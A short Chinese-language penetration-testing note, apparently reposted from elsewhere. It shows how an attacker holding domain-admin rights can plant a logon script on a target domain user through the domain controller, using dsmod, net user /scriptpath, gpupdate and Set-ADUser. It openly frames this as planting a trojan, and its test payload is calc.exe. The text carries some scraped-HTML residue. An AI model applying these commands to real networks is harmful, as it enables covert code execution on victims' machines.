在域控上使用cmd更改域使用者配置檔案中的登入指令碼

摘要：採取直接的手段不能夠解決問題，只好曲線救國。

宣告：只是作為搬運工。

0x00 利用場景

• 利用前置條件

  域管理員許可權
  

• 使用場合

  知道目標域使用者名稱稱，探測不到域使用者對應機器名或IP；
  知道目標機器IP，但是無法通往上控；
  

0x01 利用方法

PS：以下測試全部在域控上執行

一）使用dsmod給指定域使用者設定登陸指令碼

test.bat放在域控的NETLOGON目錄下面

copy test.bat \\域控\SYSVOL\sysvol\域名\SCRIPTS\test.bat
dsmod user -loscr "test.bat" "CN=x,OU=x,DC=x,DC=x,DC=x"

測試結果：

PS: 測試機為 Win-XP x86 ，第二次登出重新登陸bat指令碼才執行，bat內容為 ofollow,noindex">`@calc.exe `。

二）登陸指令碼給指定使用者種馬

logon.bat放在域控的NETLOGON目錄下面

copy logon.bat \\域控\SYSVOL\sysvol\域名\SCRIPTS\test.bat
net user xp /scriptpath:logon.bat # 內網域成員機器可以使用
gpupdate /force# 立即重新整理組策略 使用域管許可權執行不執行也行,等待隨機

測試結果與第一種方法一致

三）使用Shell/">PowerShell的Active Directory模組

ActiveDirectory.psd1 專案： ADModule

命令：

Import-Module ActiveDirectory.psd1; 或者Import-Module Microsoft.ActiveDirectory.Management.dll
Set-ADUser -Identity AD_USER -ProfilePath "filepath" -ScriptPath "filename"

引數說明

• Identity

  通過提供以下屬性值之一指定Active Directory使用者物件。括號中的識別符號是屬性的LDAP/">LDAP顯示名稱。此引數的可接受值為：

  一個名字
  GUID（objectGUID）
  安全識別符號（objectSid）
  SAM帳戶名稱（sAMAccountName）
  

• ProfilePath

  指定使用者配置檔案的路徑。該值可以是本地絕對路徑或通用命名約定（UNC）路徑。

• ScriptPath
  指定使用者登入指令碼的路徑。該值可以是本地絕對路徑或通用命名約定（UNC）路徑。

測試結果與第一種方法一致